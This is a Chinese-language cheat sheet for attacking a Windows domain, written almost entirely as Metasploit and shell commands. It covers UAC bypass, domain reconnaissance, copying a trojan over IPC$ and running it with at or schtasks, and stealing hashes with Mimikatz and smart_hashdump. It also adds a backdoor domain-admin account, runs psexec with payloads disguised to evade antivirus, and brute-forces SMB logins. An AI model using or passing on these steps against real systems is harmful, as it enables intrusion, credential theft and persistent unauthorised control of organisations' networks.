Meterpreter > shell #进入目标shell
#然后查看权限
whoami #假设结果是,xksec
net user xksec /domain
用msf的本地提权漏洞模块,逐个尝试漏洞提权
漏洞提权失败,用Bypass UAC
use exploit/windows/local/bypassuac
set session 9
run #如果成功会返回一个新的session
如果提权没成功,也是能以此机器为跳板攻击其它服务器的
信息收集
net user /domain #查看域用户
net view /domain #查看有几个域
net view /domain:xxx #查看域内主机
net group /domain #查看域里面的组
net group "domain computers" /domain #查看域内所有主机名
net group "domain admins" /domain #查看域管理员
net group "domain controllers" /domain #查看域控制器
net group "enterprise admins" /domain #查看企业管理组
nettime /domain #查看时间服务器
通过以上信息收集,可以分析出内网是怎么划分的、机器命名规则、重要人物的机器
获取一台服务器的权限
现在因为权限问题,不可以直接攻击域服务器,可采取以下方法继续渗透
用Meterpreter现有权限添加内网路由,扫描弱口令
PowerShell内网扫描( 目标系统win7以上)
架设Socks4a,然后socks会自动进行内网扫描
利用当前权限进行内网IPC$渗透
net view #在列举的机器名里,选一个和我们机器名相似的来进行IPC$渗透
假设现在有一台主机,127.0.0.666
net use \127.0.0.666/ipc$ #连接目标IPC$共享
copy s.exe \127.0.0.666\ipc$ #复制木马到目标
net time \127.0.0.666 #查时间
at \127.0.0.666 10:11 s.exe #定时启动木马
如果得到的是system权限就可以上传Mimikatz抓hash了
获取域管权限
迁移进程到域管用户进程上,或者令牌窃取也能获取域管权限
然后查看主域控IP
net time #一般来说,时间服务器都是域服务器
接着,故技重施IPC$渗透返回一个shell
如果at命令被禁用可能是win 2012,使用schtasks来添加计划任务
schtasks /run /tn Mytask
给域控添加管理员账户
net user wintry 514637666 /ad /domain
net group "domain admins" wintry /ad /domain
net group "domain admins" /domain #查看是否添加成功
登陆域控制
使用msf中的PsExec模块,建议使用Veil之类工具生成免杀的payload
use exploit/windows/smb/psexec
set smbuser wintry
set smbpass 514637666
set smbdomain MEDAB #域名称
run
反弹成功后,先迁移进程,然后查看sessions(有几个域控权限)
用msf自带模块dumphash抓取域hash,要有system权限
use post/windows/gather/smart_hashdump
show options
set session 5 #域控shell
run
SMB爆破内网
Metepreter > backgroud
exploit > route add 10.11.0.110 255.255.0.0 2 #后边是session id
search smb_login
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.11.0.110/24
set smbuser 域控user
set smbpass 域控pass
set smbdomain MA...
set threads 20
run